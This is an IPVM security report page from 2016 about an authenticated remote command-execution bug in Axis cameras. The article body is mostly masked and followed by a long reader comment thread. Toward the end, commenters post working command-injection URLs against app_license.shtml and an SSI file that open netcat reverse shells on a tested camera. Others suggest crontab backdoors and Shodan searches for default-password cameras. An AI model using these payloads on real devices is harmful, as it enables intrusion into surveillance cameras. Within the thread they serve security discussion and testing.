Axis OrwellLabs Exploit Tested

By: IPVM Team, Published on Jul 29, 2016

Another exploit has been reported for Axis cameras (OrwellLabs AXIS Authenticated Remote Command Execution), less than a month after Axis critical security vulnerability.

However, we have tested this exploit and it is not of much practical risk. In this report, we explain how the exploit works, demonstrate it in a video screencast, comment on other security issues and contrast to the Bashis exploit we tested.

******* ******* *** **** reported *** **** ******* (********** **** ************* ****** Command *********), **** **** * month ********* ******** ******** *************.

*******, ** **** ****** this ******* *** ** is *** ** **** practical ****. ** **** report, ** ******* *** *** exploit *****, *********** ** in * ***** **********, comment ** ***** ******** issues *** ********** *** ****** ******* we ******.

[***************]

Summary *******

*** **** ** ***** as **** ** ******* this *******, ***** ****** ******* the ****** ** *** exploit.

***** *** ******* **** allow ********* ** ********* commands, ** ******** *** knows *** **** ******** anyway ***** ** **** through ***, ***** ** also ********* ** **** users. 

******: ** * ********* notes, *** **** ******* online **** ********* ** easily ******* / ********** root *********, **** ***** allow **** ****** **** might ** ********* *** available if *** **** **** for *** ** ******* / ********.

*** ******* ****** **** the **** / ****** application ******* ** *** Axis ****** *** *********.

*** *****

*************, ****** *** ********** disclosed **** **** ****** ago, **** ** *** fixed ** *** ****** Axis ****** ********. ** should **, ** ** certainly ** *** ******** to **** *** ***** provide **** *********** *** problems.

******: **** *** ***** in ********** **** ********.

Exploit ************

*** ***** ***** ***** the ******* ** ******:

 

Other ******** *****

***** ********* **** ******* a *** ***** ****** tier ******** ****** *** worth ******:

  • ****, ***** **** ******* was *****, ** ******** by ******** **** *********** partners ** ******** *****. Partners *** **** **** does *** ************* ******* applications (***** **** ** an ******) *** **** this ***** ****** ** badly ******** **** ******** performance problems ** ********* *******.
  • **** **** *** ******* a ****** ****** ** the *** *********, ***** is * ****** ******** risk ** *** **** does *** **** **** the ****** ******* *** someone **** **** *** computer.
  • **** **** *** ******** multiple ***** ******** ***** could **** * ***** force, ********** ***** ******.

Contrast ** ****** / ****** ****** *******

***** ** *** ****** practical **** ** *** OrwellLabs *******, ********* ****** ****** ****** exploit** * ***** ****. The *** ********** ** that *** ****** *** does *** ******* **************, i.e., ** **** ** you *** ******* ** the ****** **** * network, *** ** *** need ** **** **** password *** *** *** get **** ******. **** is * ***** ********** and * *********** **** for *** *****.

Comments (22)

While it is not as threathening as the Bashis exploit, it still is a real danger and should have been fixed as pointed out in the article.

Still to many camera that i come across have weak/default passwords in them and then this type of problem can get real.

There's no single measure you can take to make your security waterproof but i think it's just good practice to take as many as you can in any given circumstances

if you already know the admin/root password, how dangerous is a exploit that requires admin/root password? Different story if it is exploitable by "non privileged user" to gain root privileges... try the exploit as non privileged user, to gain higher privileges, that would matter more.. otherwise, login with telnet or ssh instead...

As follow up, just tested this "exploit" as non privileged user with one Axis cam of mine, and it doesn't work. To this i do understand that Axis would not recognise this as an "vulnerability" to their products.

However, i do agree to that the fact it's a bug, and should be fixed, who knows... this could be exploited in the future by an file permission mistake from Axis side.

Right now, this so called "exploit" is bullshit... sorry to say, but for me the report it's only noice without substance...

The "exploit" could be compared to "i just hacked my neighbours vehicle, but i needed to steal the car keys before".

It's not total bullsh**.

Here's a scenario that can be exploited TODAY using this bug.

Its true that to use this you must be root. It's also true that if you are root you can enable ssh.

But just because you can enable ssh doesn't mean you can use ssh remotely. Because the firewall probably isn't open for that port, and changing the port for ssh to 80 would kill the video.

So what cameras are at risk?

All Axis devices that have the default root:pass unchanged and have no remote ssh access becsuse of the firewall.

How many is that?

Also, to remind that there is common ground here, as you said in the original discussion, which I agree:

This exploit has no practical use that I can see, as it stands now at least.
The other one on the other hand, is as bad as they get...

I was wrong when I said that it has no practical use, it has at least a small zero-day use.

It's no bashis exploit, but combined with root:pass vulnerability it gives you away around the firewall.

This makes it more incomprehensible why it wasn't plugged already.

The main main thing is.

Your ARE root on the cam.

You CAN do what you want.

Even from the Web GUI.

What's the exploit?

1st

Please tell me, what do you need this "exploit" for if you already know the login/password?

2nd

All Axis cams do force to change the password on first login.

3rd

Yes, if someone put up a cam on Internet without doing anything, you could actually use the so called "exploit", please try shodan and see how many you could access with root/pass.

Regarding the exploit, it's complete bullshit, you don't gain anything - you need to be freaking root to use it.

If you could be "regular user" and gain higher privileges, then i would not disagree.

One thing I would like to dispel is the notion of the "brilliant" self-encapsulated hack as being the sole method of exploit creation.

As often as not, a damaging exploit is really the novel combination of several existing non-critical exploits brought together in a perfect storm to create a critical vulnerability. Like tumblers in a lock falling one by one.

That is why it is essential to fix any unexpected behaviors at once. Because if Axis does not expect them, how can they evaluate the security of the device as a whole?

Although this "exploit may be of modest utility today, it is still unexpected remote command execution, and I see no reason for Axis to let it persist. If not, make it a feature... :)

Of course Axis needs to fix the bug, one day it may be wrong permissions on the the file and the hack could be executed as non root user.

But today, the bug demands to be root to be used.

1st

Please tell me, what do you need this "exploit" for if you already know the login/password?

Because the Axis web interface does not provide a remote shell callback mechanism natively.

2nd

All Axis cams do force to change the password on first login.

Wrong. Older firmware do not. Newer firmware force you to choose a password, many for nostalgic reasons choose root:pass. Because it makes it easier for them. This was a brilliant move on Axis part as it allowed them to tout their security but allowed integrators who didn't like it to effectively not use it. After all what's the difference between login in with root:pass or typing pass:pass the first time.

3rd

Yes, if someone put up a cam on Internet without doing anything, you could actually use the so called "exploit", please try shodan and see how many you could access with root/pass.

I have on numerous occasions, have you really tried?

Finally, I think that this is not a major hole just because you could install a reverse shell as root by knowing the VAPIX API alone and using editfile.cgi etc to change some startup file, reboot or something. But this is a nice and neat way requiring no knowledge of VAPIX, which is what the script kiddies want.

Your characterization of this hack as "Bullsh**" is unfair.

Mr 2

It's a bug, nothing else. and yes, it should be fixed.

In older firmwares you find plenty of bugs, and sometimes you do find something you can exploit without be logged in. Like bashis exploit.

But calling something like this as "exploit" that you already need to be root to execute (i.e. you know login and password for root) to utilise, is wrong "advertising". When you ARE root, you have everything in your hands, and you can do whatever you would like to. Nothing stops you. Not even remote connect back shell. It's up to your imagination.

It's complete nonsense to call this as "hack" or even "vulnerability", it's nothing more then regular "stolen" root account. Yes, there exist a bug, but utilise the bug, you need to be root. Thats the key - root!

IF you was regular user (let's say 'n00b'), login as 'n00b', and gain 'root' privileges with this so called "exploit", i would agree with the report - but as it's now, no.. i do not. It's no exploit nor hack.

Show me your code to get a interactive shell without cutting the video feed when behind a firewall with only port 80 open.

You have root.

what open out then? port 443? or only port 80 in and out?

You know, there is lots of files that you can tamper with, for instance /etc/crontab or any file in /usr/lib/systemd/system/multi-user.target.wants that easily could load a simple netcat connect back shell.

Thats the minor problem, the major problem is to get in, but please give me your Axis cam IP or Linux computers IP with root login and password, I will show you my connect back shell.

Get out is the minor problem.

How about you just modify your "bull****" statement to something along the lines of:

I don't believe that this exploit creates a real danger to Axis cameras in the wild, since it requires root to run in the first place, and therefore someone would be able to achieve the same result thru other methods, even without a simpler remote command execution url.

Nonetheless, I recognize that finding this unexpected behavior is helpful to security at large, as it could be used as part of another more critical exploit in the future if not identified and patched.

Thats the minor problem, the major problem is to get in, but please give me your Axis cam IP....

Ok, camera is a M3006 firmware 6.3x, factory defaulted, credentials set to root:pass. My camera. Port 80 is forwarded.

Say your still game and I'll publish the address... :)

On this M3006, I can confirm that:

http://192.168.1.1/app_license.shtml?app=ORWELLLABS%3Bnc%20192.168.1.2%2031377%20-e%20/bin/sh

does create a remote shell. There may be other ways, but I don't think any are easier or require less knowledge of Axis architecture.

As for the entirely reasonable suggestions of

You know, there is lots of files that you can tamper with, for instance /etc/crontab or any file in /usr/lib/systemd/system/multi-user.target.wants that easily could load a simple netcat connect back shell.

At least on this M3006, there is no cron or crontab, and the /usr filesystem is read only.

Remember now, we have already logged in in the cam as root, so below are no 0-day exploits… (only stupid code)

Maybe your "nc" don’t have the "-e" option, try this instead:

http://192.168.1.1/app_license.shtml?app=;mkfifo%20/tmp/s;nc%20-w%205%20192.168.1.2%2031337%200%3C/tmp/s|/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s

Equivalent could be executed by adding this small piece of code in /usr/html/local.

# cat /usr/html/local/back.shtml
<!--#include virtual="/incl/top_incl.shtml" -->
<!--#exec cmd="mkfifo /tmp/s;nc -w 5 $ip$ $port$ 0</tmp/s|/bin/sh>/tmp/s 2>/tmp/s; rm /tmp/s" -->
<!--#include virtual="/incl/bottom_incl.shtml" -->

Call with:

http://192.168.1.1/local/back.shtml?ip=192.168.1.2&port=31337

Maybe your nc doesn't have the -e option.

Its not my nc, it's Axis' chosen busybox nc make.

Do you find the dummy version of nc (without -l) out there a lot?

The named pipes are nice in a pinch though.

So, the Orwell guy found an easy way to execute a command, without even creating a file. It's just a little thing but why give him such a hard time?

Whatever, I'm out of this thread now..

Ok, have a good one!

p.s. have you ever set-up a reverse http using fifo and 4 nc processes?

like in the case when you can only connect out from the camera but wish to browse the web server remotely?

Geez, I feel bad for all these Axis partners who have to disclose all these exploits to their customers and explain why they should risk their networks!

Login to read this IPVM report.

Related Reports

Breaking Into A Facility Using Canned Air Tested on Jan 28, 2020
Access control is supposed to make doors more secure, but a $5 can of...
Use Access Control Logs To Constrain Coronavirus on Apr 09, 2020
Access control users have included capabilities that are not commonly used...
China DVR/NVR Backdoor Discovered, Huawei Refutes on Feb 07, 2020
A backdoor was found in Chinese-produced DVRs and NVRs that secretly allowed...
Dahua Critical Cloud Vulnerabilities on May 12, 2020
Dahua has acknowledged a series of cloud vulnerabilities that researcher...
Camio Presents Coronavirus Social Distancing Analytics on Apr 20, 2020
Camio presented its social distancing analytics for responding to coronavirus...
Resideo AlarmNet Has Major Outage on Mar 12, 2020
AlarmNet suffered a major outage yesterday, impacting Total Connect, Resideo,...
Add Door Operators To Fight Coronavirus on Mar 31, 2020
IPVM recommends that integrators advocate and end-users consider adding door...
Verkada Coronavirus Response: Free Temp Systems For Government and Health Care on Apr 07, 2020
Verkada has built a reputation on giving away things for free - free Yeti...
Vulnerability Directory For Access Credentials on Feb 20, 2020
Knowing which access credentials are insecure can be difficult to see,...
30 Million Criminal Face Database Tested (Captis Intelligence) on Apr 27, 2020
30 million criminal mugshots are now available for facial recognition...
ZKTeco Presents SpeedFace Recognition + Body Temperature Detection on Apr 21, 2020
ZKTeco presented its SF1008+ reader with body temperature and face mask...
Help Security End Users Facing Coronavirus Improve Remote Access on Mar 24, 2020
Many end-users and integrators are struggling with the impact of coronavirus...
Integrators Rising Against Coronavirus on May 27, 2020
IPVM integrator statistics make it clear - Coronavirus's impact on business...
ProCam Low-Cost Open Thermal Temperature Project on May 12, 2020
An engineering professor in Switzerland is building what he hopes will be the...
Hanwha Face Mask Detection Tested on Jul 01, 2020
Face mask detection or, more specifically lack-of-face-mask detection, is an...

Recent Reports

Google Invests in ADT, ADT Stock Soars on Aug 03, 2020
Google has announced a $450 million investment in the Florida-based security...
US Startup Fever Inspect Examined on Aug 03, 2020
Undoubtedly late to fever cameras, this US company, Fever Inspect, led by a...
Motorola Solutions Acquires Pelco on Aug 03, 2020
Motorola Solutions has acquired Pelco, pledging to bring blue back and make...
False: Verkada: "If You Want To Remote View Your Cameras You Need To Punch Holes In Your Firewall" on Jul 31, 2020
Verkada falsely declared to “3,000+ customers”, “300 school districts”, and...
US GSA Explains NDAA 889 Part B Blacklisting on Jul 31, 2020
With the 'Blacklist Clause' going into effect August 13 that bans the US...
Access Control Online Show July 2020 - On-Demand Recording of 45+ Manufacturers Presentations on Jul 30, 2020
The show featured 48 Access Control presentations, all now recorded and...
Face Detection Shootout - Dahua, Hanwha, Hikvision, Uniview, Vivotek on Jul 30, 2020
Face detection analytics are available from a number of manufactures...
Sunell is The First China Manufacturer to Market NDAA Compliance on Jul 30, 2020
Most China manufacturers are going to be impacted by the NDAA 'Blacklist...
Ink Labs Relabels China YCX Fever Camera And Steals Dahua's Marketing on Jul 30, 2020
A US company marketed a 'thermal temperature scanner' as its own, selling...
Genetec and Dahua-Backed Intelbras Split Examined on Jul 29, 2020
China is the cause of the breakup between Canada's and Brazil's largest video...
This YouTuber is Now Selling ThermoHealth Temperature Screening on Jul 29, 2020
An enterprising 20-year old is mass marketing medical devices on Facebook and...
Hikvision Returns To Growth Driven By Overseas Fever Cameras on Jul 29, 2020
While Hikvision's revenue fell in Q1 2020, it rebounded in Q2 attributed to...
Brazil's Biggest Domestic Surveillance Company Intelbras Profile on Jul 29, 2020
While Intelbras is not widely known outside of Latin America, Intelbras is a...
The Kiosk Market Pivots To Temperature Screening (Interviewed) on Jul 28, 2020
Video surveillance is not the only market that has pivoted to medical device...
Integrator Acquisitions 'A Good Market' During COVID-19, Says Greybeards on Jul 28, 2020
Industry broker Ron Davis of the "Greybeards" says that the integrator and...